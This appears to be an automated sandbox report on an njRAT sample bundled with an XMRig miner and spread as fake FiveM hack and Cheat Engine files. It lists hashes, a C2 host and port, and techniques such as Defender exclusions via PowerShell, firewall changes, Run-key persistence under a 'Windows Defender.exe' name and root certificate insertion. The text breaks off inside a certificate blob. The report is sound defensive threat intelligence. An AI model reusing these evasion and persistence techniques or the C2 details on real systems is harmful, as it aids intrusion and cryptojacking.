njrat | 461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c

Analysis

max time kernel
152s
max time network
159s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
06-02-2025 06:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
Size

57.6MB
MD5

0956d30facdbb958dabe6d13e751976f
SHA1

80cd8d27d451f221c58541a68566d49463d97aeb
SHA256

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c
SHA512

c0457356da8ea38a4b7445b79e8d7bd95b76fbdfd6707b84df2bd0f8cf62f65316b7bc6c34c4c2044f35a7cb6bf937c9efcb73760581e5514e6cb1776f17a463
SSDEEP

1572864:Lf3VbWblqQ2LTbGk2kR0zvpspjSG/kt7Rb2n6CL0d:r3VLHbGkjRM+SGx6Uo

Score

10^/10

njrat xmrig hacked defense_evasion discovery execution miner persistence privilege_escalation trojan upx

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

postpix.shop:1177

Mutex

aa63d8c3a8435a58d0b9f32e46b3a601

Attributes

reg_key
aa63d8c3a8435a58d0b9f32e46b3a601
splitter
|'|'|

Signatures

Njrat family
njrat
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 23 IoCs

miner

resource	yara_rule
behavioral1/memory/3036-76-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3036-77-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3036-82-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3036-81-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3036-80-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3036-79-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3036-83-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1984-328-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-330-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-317-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-323-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-311-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-321-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-320-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-315-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-313-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-326-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-309-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-336-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-334-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-338-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-335-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1984-337-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2132	powershell.exe
2116	powershell.exe
2792	powershell.exe
2036	powershell.exe
2400	powershell.exe
2012	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 1 IoCs

flow	pid	Process
21	2952	CheatEngine75.tmp

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2684	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe

Executes dropped EXE 13 IoCs

pid	Process
2392	Server.exe
2956	Windows Defender.exe
536	build.exe
1764	FiveM.exe
464	Process not Found
2016	dlpwxhhxvcgc.exe
288	Rename_Z60IHLDjO6.exe
1760	FiveM Hack.exe
2640	FiveM Hack.exe
2448	CheatEngine75.exe
2952	CheatEngine75.tmp
1012	services64.exe
1036	sihost64.exe

Loads dropped DLL 28 IoCs

pid	Process
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2392	Server.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
464	Process not Found
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
1424	Process not Found
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
1760	FiveM Hack.exe
2640	FiveM Hack.exe
2640	FiveM Hack.exe
2640	FiveM Hack.exe
2640	FiveM Hack.exe
2640	FiveM Hack.exe
2640	FiveM Hack.exe
2640	FiveM Hack.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
2448	CheatEngine75.exe
1996	cmd.exe
2952	CheatEngine75.tmp
2088	conhost.exe
2952	CheatEngine75.tmp

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe

Checks for any installed AV software in registry 1 TTPs 9 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	build.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	dlpwxhhxvcgc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2016 set thread context of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 set thread context of 3036	2016	dlpwxhhxvcgc.exe	54
PID 2088 set thread context of 1984	2088	conhost.exe	80

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3036-71-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-72-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-73-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-74-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-76-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-75-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-77-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-82-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-81-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-80-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-79-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3036-83-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/files/0x000500000001c846-172.dat	upx
behavioral1/memory/2640-174-0x000007FEF7010000-0x000007FEF75F8000-memory.dmp	upx
behavioral1/memory/2640-182-0x000007FEF7010000-0x000007FEF75F8000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1292	sc.exe
900	sc.exe
2448	sc.exe
2336	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Defender.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	CheatEngine75.tmp

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b031ce086078db01	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0